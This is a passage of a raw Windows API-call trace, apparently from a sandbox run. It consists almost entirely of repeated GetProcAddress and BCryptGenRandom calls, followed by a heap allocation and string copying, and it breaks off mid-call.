(hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.793] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0230.793] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.793] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0230.793] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.794] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0230.794] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.794] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0230.794] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.794] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0230.794] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.794] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0230.795] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.795] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0230.795] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.795] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0230.795] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.795] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0230.795] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.796] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0230.796] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.796] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0230.796] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.796] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0230.796] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.796] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0230.797] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.797] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0230.797] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.797] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0230.797] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.797] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0230.797] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.797] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0230.798] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.798] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0230.798] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.798] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0230.798] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.798] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a03088, cbBuffer=0x14, dwFlags=0x2 | out: pbBuffer=0x3a03088) returned 0x0 [0230.798] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.798] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0230.798] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.798] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0230.799] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.799] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0230.799] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.799] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0230.799] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.799] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0230.799] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.799] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0230.800] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.800] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0230.800] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.800] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0230.800] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.800] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0230.800] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.800] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0230.801] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.801] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0230.801] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.801] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0230.801] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.801] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0230.802] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.802] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0230.802] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.802] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0230.802] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.802] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0230.802] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.802] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0230.803] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.803] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0230.803] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.803] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a0309c, cbBuffer=0x19, dwFlags=0x2 | out: pbBuffer=0x3a0309c) returned 0x0 [0230.803] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.803] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0230.803] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.803] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0230.804] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.804] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0230.804] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.804] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0230.804] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.804] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0230.804] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.804] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0230.805] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.805] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0230.805] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.805] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0230.805] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.805] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0230.806] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.806] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0230.806] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.806] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0230.806] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.806] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0230.806] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.806] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0230.807] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.807] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0230.807] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.807] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0230.807] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.807] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0230.807] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.807] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a030b5, cbBuffer=0x2c, dwFlags=0x2 | out: pbBuffer=0x3a030b5) returned 0x0 [0230.808] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.808] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0230.808] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.808] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0230.808] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.808] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0230.808] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.808] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0230.809] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.809] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0230.809] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.809] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0230.809] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.809] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0230.809] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.822] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0230.822] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.822] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0230.822] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.822] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0230.823] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.823] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0230.823] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.823] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0230.823] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.823] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0230.823] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.824] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0230.824] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.824] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0230.824] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.825] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0230.826] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.826] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0230.826] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.826] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0230.826] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.826] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0230.826] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.826] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0230.827] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.827] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0230.827] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.827] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0230.827] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.827] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0230.827] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.827] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0230.827] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.827] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0230.828] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.828] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0230.828] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.828] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0230.828] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.828] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0230.828] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.828] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0230.828] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.828] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0230.829] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.829] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0230.829] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.829] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0230.829] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.829] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0230.829] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.829] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0230.829] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.829] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0230.830] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.830] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0230.830] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.830] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0230.830] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.830] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0230.830] GetProcessHeap () returned 0x440000 [0230.830] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x473980 [0230.830] lstrcpyA (in: lpString1=0x473980, lpString2="\x04" | out: lpString1="\x04") returned="\x04" [0230.830] lstrcatA (in: lpString1="\x04", 